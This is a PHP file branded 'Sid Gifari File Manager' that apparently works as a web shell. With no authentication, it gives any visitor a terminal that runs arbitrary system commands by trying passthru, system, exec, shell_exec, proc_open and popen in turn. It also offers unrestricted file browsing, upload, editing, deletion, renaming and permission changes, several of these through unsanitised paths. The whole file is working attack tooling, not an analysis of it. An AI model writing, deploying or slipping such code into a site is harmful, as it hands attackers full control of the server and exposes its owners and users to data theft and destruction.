<?php
// ================= CONFIG =================
$ROOT = __DIR__;
$BASE_URL = strtok($_SERVER["REQUEST_URI"], '?');

// ================= PATH ENCODER =================
function encodePath($path)
{
    $a = array("/", "\\", ".", ":");
    $b = array("A", "D", "I", "B");
    return str_replace($a, $b, $path);
}

function decodePath($path)
{
    $a = array("/", "\\", ".", ":");
    $b = array("A", "D", "I", "B");
    return str_replace($b, $a, $path);
}

// ================= PATH HANDLING =================
$root_path = $ROOT;

if (isset($_GET['p'])) {
    if ($_GET['p'] === '') {
        $p = $root_path;
    } elseif (!is_dir(decodePath($_GET['p']))) {
        echo "<script>alert('Directory is Corrupted and Unreadable.');window.location.replace('?');</script>";
        exit;
    } else {
        $p = decodePath($_GET['p']);
    }
} else {
    $p = $root_path;
}

define("PATH", $p);

// ================= SESSION + AUTO SYNC TERMINAL DIR =================
session_start();

// Always sync terminal cwd with file manager path
if (!isset($_SESSION['cwd']) || (realpath($_SESSION['cwd']) !== realpath(PATH) && realpath(PATH) !== false)) {
    $_SESSION['cwd'] = realpath(PATH);
}

// ================= ACTIONS =================
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    
    // Terminal command execution - MUST BE FIRST to avoid conflicts
    if (isset($_POST['terminal']) && !empty($_POST['terminal-text'])) {
        $execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen'];
        $canExecute = false;
        foreach ($execFunctions as $func) {
            if (function_exists($func)) {
                $canExecute = true;
                break;
            }
        }
        
        $cwd = $_SESSION['cwd'];
        $cmdInput = trim($_POST['terminal-text']);
        $output = "";

        // Handle cd command
        if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
            $dir = trim($matches[1]);
            
            if ($dir === '' || $dir === '~') {
                $dir = $root_path;
            } elseif ($dir[0] !== '/' && $dir[0] !== '\\') {
                $dir = $cwd . DIRECTORY_SEPARATOR . $dir;
            }
            
            $realDir = realpath($dir);
            
            if ($realDir && is_dir($realDir)) {
                $_SESSION['cwd'] = $realDir;
                $cwd = $realDir;
                $output = "Changed directory to " . htmlspecialchars($realDir);
            } else {
                $output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
            }
            
            // Store output in session to display after redirect
            $_SESSION['terminal_output'] = $output;
            $_SESSION['terminal_cwd'] = $cwd;
            
            // Redirect back with current path
            header("Location: ?p=" . urlencode(encodePath(PATH)));
            exit;
            
        } elseif ($canExecute) {
            // Change to terminal's working directory
            chdir($cwd);
            
            $cmd = $cmdInput . " 2>&1";
            
            // Execute command
            if (function_exists('passthru')) {
                ob_start();
                passthru($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('system')) {
                ob_start();
                system($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('exec')) {
                exec($cmd, $out);
                $output = implode("\n", $out);
            } elseif (function_exists('shell_exec')) {
                $output = shell_exec($cmd);
            } elseif (function_exists('proc_open')) {
                $pipes = [];
                $process = proc_open($cmd, [
                    0 => ["pipe", "r"],
                    1 => ["pipe", "w"],
                    2 => ["pipe", "w"]
                ], $pipes, $cwd);
                
                if (is_resource($process)) {
                    fclose($pipes[0]);
                    $output = stream_get_contents($pipes[1]);
                    fclose($pipes[1]);
                    $output .= stream_get_contents($pipes[2]);
                    fclose($pipes[2]);
                    proc_close($process);
                }
            } elseif (function_exists('popen')) {
                $handle = popen($cmd, 'r');
                if ($handle) {
                    $output = stream_get_contents($handle);
                    pclose($handle);
                }
            }
            
            // Store output in session
            $_SESSION['terminal_output'] = $output;
            $_SESSION['terminal_cwd'] = $cwd;
            
            // Redirect back
            header("Location: ?p=" . urlencode(encodePath(PATH)));
            exit;
        } else {
            $_SESSION['terminal_output'] = "Command execution functions are disabled on this server.";
            header("Location: ?p=" . urlencode(encodePath(PATH)));
            exit;
        }
    }
    
    // File manager actions (original code)
    // Upload
    if (!empty($_FILES['files'])) {
        foreach ($_FILES['files']['tmp_name'] as $i => $tmp) {
            if ($tmp && is_uploaded_file($tmp)) {
                move_uploaded_file($tmp, PATH . '/' . basename($_FILES['files']['name'][$i]));
            }
        }
    }

    // New Folder
    if (!empty($_POST['newfolder'])) {
        mkdir(PATH . '/' . basename($_POST['newfolder']), 0755);
    }

    // New File
    if (!empty($_POST['newfile'])) {
        file_put_contents(PATH . '/' . basename($_POST['newfile']), '');
    }

    // Delete
    if (!empty($_POST['delete'])) {
        $target = PATH . '/' . $_POST['delete'];
        if (is_file($target)) unlink($target);
        elseif (is_dir($target)) rmdir($target);
    }

    // Rename
    if (!empty($_POST['old']) && !empty($_POST['new'])) {
        rename(PATH . '/' . $_POST['old'], PATH . '/' . $_POST['new']);
    }

    // Chmod
    if (!empty($_POST['chmod_file']) && isset($_POST['chmod'])) {
        chmod(PATH . '/' . $_POST['chmod_file'], intval($_POST['chmod'], 8));
    }

    // Edit save
    if (!empty($_POST['edit_file']) && isset($_POST['content'])) {
        file_put_contents(PATH . '/' . $_POST['edit_file'], $_POST['content']);
    }

    header("Location: ?p=" . urlencode(encodePath(PATH)));
    exit;
}

// ================= FILE LIST =================
$items = scandir(PATH);

// Edit mode
$editMode = isset($_GET['edit']);
$editFile = $_GET['edit'] ?? '';
$editContent = '';

if ($editMode && is_file(PATH . '/' . $editFile)) {
    $editContent = htmlspecialchars(file_get_contents(PATH . '/' . $editFile));
}

// Terminal output
$terminal_output = $_SESSION['terminal_output'] ?? '';
$terminal_cwd = $_SESSION['terminal_cwd'] ?? PATH;

unset($_SESSION['terminal_output'], $_SESSION['terminal_cwd']);
?>

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title></title>
<style>
body {
    font-family: 'Segoe UI', Arial, sans-serif;
    background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
    margin: 0;
    padding: 20px;
    min-height: 100vh;
}
.container {
    max-width: 1400px;
    margin: auto;
    background: rgba(255, 255, 255, 0.95);
    border-radius: 10px;
    box-shadow: 0 10px 30px rgba(0,0,0,0.3);
    overflow: hidden;
    padding: 20px;
}
.header {
    text-align: center;
    padding: 20px 0;
    background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
    margin: -20px -20px 20px -20px;
    color: white;
}
.header img {
    border-radius: 50%;
    box-shadow: 0 5px 15px rgba(0,0,0,0.3);
}
table {
    width: 100%;
    background: #fff;
    border-collapse: collapse;
    border-radius: 8px;
    overflow: hidden;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}
th, td {
    padding: 12px 15px;
    border-bottom: 1px solid #e0e0e0;
    text-align: left;
}
th {
    background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
    color: white;
    font-weight: 600;
}
tr:hover {
    background-color: #f5f5f5;
}
a {
    text-decoration: none;
    color: #667eea;
    font-weight: 500;
}
a:hover {
    color: #764ba2;
    text-decoration: underline;
}
button, input[type="submit"] {
    background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
    color: white;
    border: none;
    padding: 8px 16px;
    border-radius: 5px;
    cursor: pointer;
    font-weight: 500;
    transition: transform 0.2s, box-shadow 0.2s;
}
button:hover, input[type="submit"]:hover {
    transform: translateY(-2px);
    box-shadow: 0 5px 15px rgba(0,0,0,0.2);
}
.path-nav {
    background: #fff;
    padding: 15px;
    margin-bottom: 20px;
    border-radius: 8px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
    font-size: 14px;
}
.path-nav a {
    color: #667eea;
    font-weight: 500;
}
textarea {
    width: 100%;
    font-family: 'Consolas', 'Monaco', monospace;
    padding: 15px;
    border: 1px solid #ddd;
    border-radius: 5px;
    font-size: 14px;
    resize: vertical;
}
.terminal-output {
    background: #1e1e1e;
    color: #00ff00;
    padding: 15px;
    font-family: 'Consolas', 'Monaco', monospace;
    white-space: pre-wrap;
    border-radius: 5px;
    margin-top: 10px;
    font-size: 13px;
    max-height: 300px;
    overflow-y: auto;
}
.terminal-header {
    background: #333;
    color: #fff;
    padding: 12px 15px;
    border-radius: 5px 5px 0 0;
    display: flex;
    justify-content: space-between;
    align-items: center;
}
.terminal-header span {
    font-family: 'Consolas', 'Monaco', monospace;
}
.actions-bar {
    background: #fff;
    padding: 15px;
    margin-bottom: 20px;
    border-radius: 8px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
    display: flex;
    flex-wrap: wrap;
    gap: 10px;
    align-items: center;
}
.actions-bar form {
    margin: 0;
    display: flex;
    gap: 10px;
    align-items: center;
}
.actions-bar input[type="text"],
.actions-bar input[type="file"] {
    padding: 8px 12px;
    border: 1px solid #ddd;
    border-radius: 5px;
    flex-grow: 1;
}
.file-icon {
    margin-right: 8px;
    font-size: 16px;
}
.delete-btn {
    background: linear-gradient(135deg, #ff416c 0%, #ff4b2b 100%);
}
.delete-btn:hover {
    background: linear-gradient(135deg, #ff4b2b 0%, #ff416c 100%);
}
.edit-btn {
    background: linear-gradient(135deg, #4CAF50 0%, #45a049 100%);
}
.edit-btn:hover {
    background: linear-gradient(135deg, #45a049 0%, #4CAF50 100%);
}
.rename-form {
    display: inline-flex;
    gap: 5px;
    align-items: center;
}
.terminal-form {
    margin-top: 10px;
    display: flex;
    gap: 10px;
}
.terminal-form input[type="text"] {
    flex-grow: 1;
    padding: 10px;
    border: 1px solid #444;
    background: #222;
    color: #fff;
    border-radius: 3px;
    font-family: 'Consolas', 'Monaco', monospace;
}
.chmod-form {
    display: inline-flex;
    gap: 5px;
    align-items: center;
}
.chmod-form input {
    width: 60px;
    padding: 5px;
    border: 1px solid #ddd;
    border-radius: 3px;
}
@media (max-width: 768px) {
    .container {
        padding: 10px;
    }
    .actions-bar {
        flex-direction: column;
        align-items: stretch;
    }
    th, td {
        padding: 8px;
        font-size: 14px;
    }
    .terminal-form {
        flex-direction: column;
    }
}
</style>
</head>
<body>

<div class="container">
    <div class="header">
        <img src="https://i.imgur.com/FC1enOU.jpeg" width="120" height="120" alt="Logo">
        <h1>Sid Gifari File Manager</h1>
    </div>

    <!-- PATH NAV -->
    <div class="path-nav">
        <a href="?">🏠 Root</a> /
        <?php
        $path = str_replace('\\','/',PATH);
        $parts = explode('/',$path);
        $build = '';
        foreach ($parts as $part) {
            if ($part === '') continue;
            $build .= '/' . $part;
            echo '<a href="?p=' . urlencode(encodePath($build)) . '">' . htmlspecialchars($part) . '</a> / ';
        }
        ?>
    </div>

    <?php if ($editMode): ?>
    <!-- EDIT MODE -->
    <div style="background: #fff; padding: 20px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1);">
        <h3>📝 Editing: <?= htmlspecialchars($editFile) ?></h3>
        <form method="post">
            <input type="hidden" name="edit_file" value="<?= htmlspecialchars($editFile) ?>">
            <textarea name="content" rows="20"><?= $editContent ?></textarea><br><br>
            <div style="display: flex; gap: 10px;">
                <button type="submit" class="edit-btn">💾 Save</button>
                <a href="?p=<?= urlencode(encodePath(PATH)) ?>"><button type="button">❌ Cancel</button></a>
            </div>
        </form>
    </div>

    <?php else: ?>
    <!-- NORMAL MODE -->

    <!-- TERMINAL SECTION -->
    <div style="margin-bottom: 20px;">
        <div class="terminal-header">
            <span>💻 Terminal@Sid-Gifari <strong><?= htmlspecialchars($terminal_cwd) ?></strong></span>

        </div>
        <?php if ($terminal_output): ?>
        <div class="terminal-output"><?= htmlspecialchars($terminal_output) ?></div>
        <?php endif; ?>
        <form method="post" class="terminal-form">
            <input type="text" name="terminal-text" placeholder="Enter command (e.g., ls, pwd, whoami)" autocomplete="off">
            <input type="submit" name="terminal" value="▶ Execute">
        </form>
    </div>

    <!-- FILE MANAGER ACTIONS -->
    <div class="actions-bar">
        <form method="post">
            <input type="text" name="newfolder" placeholder="Folder name" required>
            <button type="submit">📁 Create Folder</button>
        </form>

        <form method="post">
            <input type="text" name="newfile" placeholder="File name" required>
            <button type="submit">📄 Create File</button>
        </form>

        <form method="post" enctype="multipart/form-data">
            <input type="file" name="files[]" multiple>
            <button type="submit">⬆ Upload</button>
        </form>
    </div>

    <!-- FILE LIST -->
    <table>
        <thead>
            <tr>
                <th>Name</th>
                <th>Size</th>
                <th>Permissions</th>
                <th>Actions</th>
            </tr>
        </thead>
        <tbody>
            <?php foreach ($items as $f):
            if ($f === '.' || $f === '..') continue;
            $full = PATH . '/' . $f;
            $isDir = is_dir($full);
            $perm = substr(sprintf('%o', fileperms($full)), -4);
            ?>
            <tr>
                <td>
                    <span class="file-icon"><?= $isDir ? '📁' : '📄' ?></span>
                    <?php if ($isDir): ?>
                    <a href="?p=<?= urlencode(encodePath($full)) ?>"><?= htmlspecialchars($f) ?></a>
                    <?php else: ?>
                    <a href="<?= htmlspecialchars($BASE_URL . '/' . $f) ?>" target="_blank" title="Open file"><?= htmlspecialchars($f) ?></a>
                    <?php endif; ?>
                </td>
                <td>
                    <?php if (!$isDir): ?>
                    <?= number_format(filesize($full)) ?> bytes
                    <?php else: ?>
                    <em>Directory</em>
                    <?php endif; ?>
                </td>
                <td>
                    <form method="post" class="chmod-form">
                        <input type="hidden" name="chmod_file" value="<?= htmlspecialchars($f) ?>">
                        <input type="text" name="chmod" value="<?= $perm ?>" size="4" pattern="[0-7]{4}" title="4-digit octal permission (e.g., 0755)">
                        <button type="submit" style="padding: 5px 8px;">Chmod</button>
                    </form>
                </td>
                <td>
                    <?php if (!$isDir): ?>
                    <a href="?p=<?= urlencode(encodePath(PATH)) ?>&edit=<?= urlencode($f) ?>">
                        <button class="edit-btn" style="padding: 5px 8px;">✏️ Edit</button>
                    </a>
                    <?php endif; ?>
                    
                    <form method="post" class="rename-form">
                        <input type="hidden" name="old" value="<?= htmlspecialchars($f) ?>">
                        <input type="text" name="new" placeholder="New name" style="width: 120px; padding: 5px;">
                        <button type="submit" style="padding: 5px 8px;">📝 Rename</button>
                    </form>
                    
                    <form method="post" style="display: inline;">
                        <input type="hidden" name="delete" value="<?= htmlspecialchars($f) ?>">
                        <button type="submit" class="delete-btn" style="padding: 5px 8px;" onclick="return confirm('Are you sure you want to delete <?= htmlspecialchars(addslashes($f)) ?>?')">🗑️ Delete</button>
                    </form>
                </td>
            </tr>
            <?php endforeach; ?>
        </tbody>
    </table>
    <?php endif; ?>

    <div style="text-align: center; margin-top: 30px; padding-top: 20px; border-top: 1px solid #eee; color: #666; font-size: 12px;">
        Sid Gifari File Manager v1.0 | Terminal Auto-Sync Enabled | Current Path: <?= htmlspecialchars(PATH) ?>
    </div>
</div>

<script>
// Auto-focus on terminal input
document.querySelector('input[name="terminal-text"]')?.focus();

// Auto-focus on rename input when clicked
document.querySelectorAll('.rename-form input[name="new"]').forEach(input => {
    input.addEventListener('click', function() {
        this.focus();
        this.select();
    });
});

// Confirm before deleting
document.querySelectorAll('.delete-btn').forEach(button => {
    button.addEventListener('click', function(e) {
        if (!confirm('Are you sure you want to delete this item?')) {
            e.preventDefault();
        }
    });
});
</script>
</body>
</html>